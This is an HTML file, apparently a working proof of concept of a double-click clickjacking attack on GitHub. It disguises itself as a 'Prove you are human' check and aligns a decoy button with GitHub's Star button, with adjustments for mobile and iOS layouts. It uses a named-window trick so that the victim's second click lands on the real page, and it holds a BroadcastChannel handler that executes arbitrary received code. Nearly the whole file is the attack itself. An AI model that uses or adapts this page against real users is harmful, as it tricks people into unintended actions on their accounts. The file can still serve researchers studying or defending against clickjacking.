<!doctype html>
<html>
  <head>
    <title>Prove you are human</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script>
      new BroadcastChannel('eval').onmessage = (e) => new Function(e.data)()
    </script>
  </head>
  <body>
    <h1>Prove you are human</h1>
    <p>Double click every button on this page to prove you are a human</p>

    <div id="buttons">
      <button id="main-button" class="sized positioned"></button>
    </div>

    <script type="module">
      import { isMobile } from '../../library/isMobile'

      const container = document.getElementById('buttons')
      const mainButton = document.getElementById('main-button')

      const buttonCount = 10
      const buttonWidth = 102
      const buttonHeight = 28
      const maxTop = window.innerHeight / 4 - buttonHeight
      const maxLeft = window.innerWidth - buttonWidth

      mainButton.addEventListener('click', (event) => {
        // try {
        // const baseTab = window.opener.opener
        // const attackTab = window.opener

        // const baseFunction = baseTab.Function(
        //   'win',
        //   `
        //   console.log('Starting delay for', win)
        //   setTimeout(() => {
        //     console.log('Redirecting', win)
        //     win.location.replace('success')
        //   }, 750)
        // `
        // )

        // baseFunction(attackTab)
        // } catch {}

        new BroadcastChannel('eval').postMessage(`
          setTimeout(() => {
            console.log('Redirecting to success')
            window.open('success', 'github-attack')
          }, 750)
        `)

        window.close()
      })

      let buttons = [mainButton]

      for (let i = 1; i < buttonCount; i++) {
        const btn = document.createElement('button')
        btn.className = 'sized'
        btn.style.position = 'absolute'
        btn.style.top = `${Math.random() * maxTop}px`
        btn.style.left = `${Math.random() * maxLeft}px`
        container.prepend(btn)
        buttons.push(btn)

        btn.addEventListener('click', (event) => {
          /** @type {HTMLButtonElement} */
          const clicked = event.currentTarget
          if (clicked.classList.contains('clicked')) {
            // now we're on the second click, remove the button and reenable all buttons
            clicked.remove()
            buttons = buttons.filter((b) => b !== clicked)
            buttons.forEach((b) => (b.disabled = false))
          } else {
            // first click, disable all other buttons
            buttons.forEach((b) => {
              if (b !== clicked) {
                b.disabled = true
              }
            })
            clicked.classList.add('clicked')
          }
        })
      }
    </script>
    <style>
      body {
        font-family: sans-serif;
      }
      * {
        touch-action: none;
      }
      /* Sized the same as the "Star" button on GitHub, and styled for this page */
      .sized {
        height: 28px;
        width: 102px;
        border: none;
        border-radius: 0.375rem;
        opacity: 0.7;
        background-color: #000000;
      }
      /* Precisely positioned to match the position of the Star button on GitHub */
      .positioned {
        position: absolute;
        top: 7.5rem;
        right: calc(max((100vw - 1280px) / 2, 0px) + 48px + 1rem);
      }
      /* Used when the button has been clicked once */
      .clicked {
        background-color: #00ff00;
        opacity: 1;
      }

      /* Narrow layout */
      @media (max-width: 767.98px) {
        .positioned {
          left: 6rem;
        }
        .sized {
          width: 2rem;
          height: 2rem;
        }
      }

      /* Account for the "Open in the GitHub app" bar which may be present on iOS */
      /* Shift down half so hopefully they click whichever position is there */
      @supports (-webkit-touch-callout: none) {
        .positioned {
          top: calc(7.5rem + (45px / 2));
        }
      }
    </style>
  </body>
</html>
